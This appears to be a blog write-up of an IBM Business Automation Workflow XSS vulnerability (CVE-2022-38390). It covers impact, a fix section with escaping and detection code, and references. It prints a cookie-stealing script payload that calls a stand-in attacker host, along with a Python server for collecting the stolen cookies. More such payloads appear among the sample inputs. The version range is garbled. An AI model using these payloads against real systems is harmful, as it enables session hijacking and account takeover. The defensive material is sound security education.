IBM Business Automation Workflow is a popular tool for businesses to automate processes and improve work efficiency. But like all software, it isn’t immune to vulnerabilities. In this exclusive breakdown, we dig deep into CVE-2022-38390—a flaw that opened the doors for cross-site scripting (XSS) attacks on multiple IBM Business Automation Workflow (BAW) versions. We’ll show you the exploit, explain the risks, and share original references.
What is CVE-2022-38390?
This vulnerability was discovered and tracked as IBM X-Force ID: 233978 (X-Force Exchange). It exists in several releases of IBM Business Automation Workflow. It’s caused by insufficient sanitization of user-supplied input in the BAW web interface.
Impact:
Attackers can inject malicious JavaScript into forms and pages, which then execute in the browser of anyone viewing those pages. Since BAW is typically used by employees within trusted sessions, this can lead to credential theft, session hijacking, or even full account takeover.
User Interaction: Required—the victim needs to load the malicious page.
This is especially dangerous in internal environments, where staff are assumed trusted and may have broad access.
Vulnerable Versions
IBM’s official security bulletin lists the affected versions, including:
IBM Cloud Pak for Business Automation 21..2 - 21..3
Always check the original IBM notice for the most current information.
Exploit Details
Let’s see how an attacker could exploit this bug in the wild. Suppose the workflow UI has a form where users can enter their “department name.”
The problem: The system does not filter out HTML or JavaScript when displaying this field back to users.
Step 1: The Payload

```html
<script>
fetch('https://attacker.com/steal?cookie=' + document.cookie);
</script>
```
*User enters this as their department name.*
Step 2: The Malicious Script Executes
Whenever a page displays this department name (e.g., a report, dashboard, or approval queue), the victim’s browser runs the injected code.
On their end, attackers set up a simple HTTP server to catch the incoming steal requests:

```python
# attacker_server.py example
from http.server import HTTPServer, BaseHTTPRequestHandler


class StealHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        print(self.path)  # Logs: /steal?cookie=...
        self.send_response(200)
        self.end_headers()


HTTPServer(('...', 80), StealHandler).serve_forever()
```
The attacker uses these cookies to hijack the victim’s session.
Preventive Measures
IBM’s Fix:
IBM released patches. Update immediately! See: IBM Security Bulletin
- Never trust user input—always sanitize or escape data rendered in HTML.
- Use security libraries (like DOMPurify) to filter scripts.
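The two measures above in working form, as an added example that is not IBM's code or part of the original bulletin: a contextual HTML-encoding function applied to the "department name" field before it is rendered (shown beside the unencoded version that reproduces the bug), plus a server-side heuristic that flags suspicious submissions for logging and review. The renderer functions, the `SUSPICIOUS` pattern list and the sample submissions are all assumptions constructed for the example.

```javascript
// Added example, not IBM BAW code. Demonstrates output encoding for a
// user-controlled value placed in HTML, and a simple detection heuristic
// for stored-XSS attempts in submitted form fields.

// Escape the characters that matter in an HTML text or attribute context.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hypothetical report-cell renderer. The "unsafe" form concatenates raw
// input into markup (the pattern behind the vulnerability); the "safe"
// form encodes the value first so the browser treats it as text.
function renderDepartmentUnsafe(name) {
  return '<td class="department">' + name + '</td>';
}

function renderDepartmentSafe(name) {
  return '<td class="department">' + escapeHtml(name) + '</td>';
}

// Heuristic patterns for flagging submissions that look like XSS attempts.
// This is a detection aid for alerting, not a substitute for encoding.
const SUSPICIOUS = [
  /<\s*script\b/i,                    // <script ...>
  /\bon\w+\s*=/i,                     // event handler attributes, e.g. onerror=
  /javascript\s*:/i,                  // javascript: URLs
  /<\s*(iframe|object|embed|svg)\b/i, // other tags that can run script
];

function looksLikeXss(input) {
  return SUSPICIOUS.some((re) => re.test(String(input)));
}

// Constructed sample submissions (not real BAW data).
const SAMPLE_SUBMISSIONS = [
  { user: 'alice', department: 'Finance' },
  { user: 'bob', department: 'R&D <Europe>' },
  { user: 'mallory', department: "<script>fetch('https://attacker.example/steal?cookie=' + document.cookie)</script>" },
  { user: 'trent', department: '<img src=x onerror=alert(1)>' },
];

// Returns the users whose submitted department name matches a pattern.
function flagSuspiciousSubmissions(submissions) {
  return submissions
    .filter((s) => looksLikeXss(s.department))
    .map((s) => s.user);
}

// True when every safely rendered cell contains no tag other than <td>.
function allCellsInert(submissions) {
  return submissions.every(
    (s) => !/<(?!\/?td\b)/.test(renderDepartmentSafe(s.department))
  );
}

// Stand-alone run: show the before/after rendering and the flagged users.
for (const s of SAMPLE_SUBMISSIONS) {
  console.log('unsafe:', renderDepartmentUnsafe(s.department));
  console.log('safe:  ', renderDepartmentSafe(s.department));
}
console.log('flagged for review:', flagSuspiciousSubmissions(SAMPLE_SUBMISSIONS));
```

Note that the encoding, not the heuristic, is what closes the hole: `escapeHtml` neutralises any input, including ones the pattern list has never seen, while `looksLikeXss` only tells you someone tried. Legitimate names such as "R&D <Europe>" render correctly after encoding and are not flagged.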
Key References
- CVE-2022-38390 at NVD
- IBM X-Force Exchange 233978
- IBM Security Bulletin
Closing Thoughts
CVE-2022-38390 reminds us: Security starts with safe data handling. Even reputable tools like IBM BAW can have major holes if input isn’t cleaned. Update your software, test for XSS, and always limit the impact should something slip through.
Timeline
Published on: 11/17/2022 17:15:00 UTC
Last modified on: 11/18/2022 18:58:00 UTC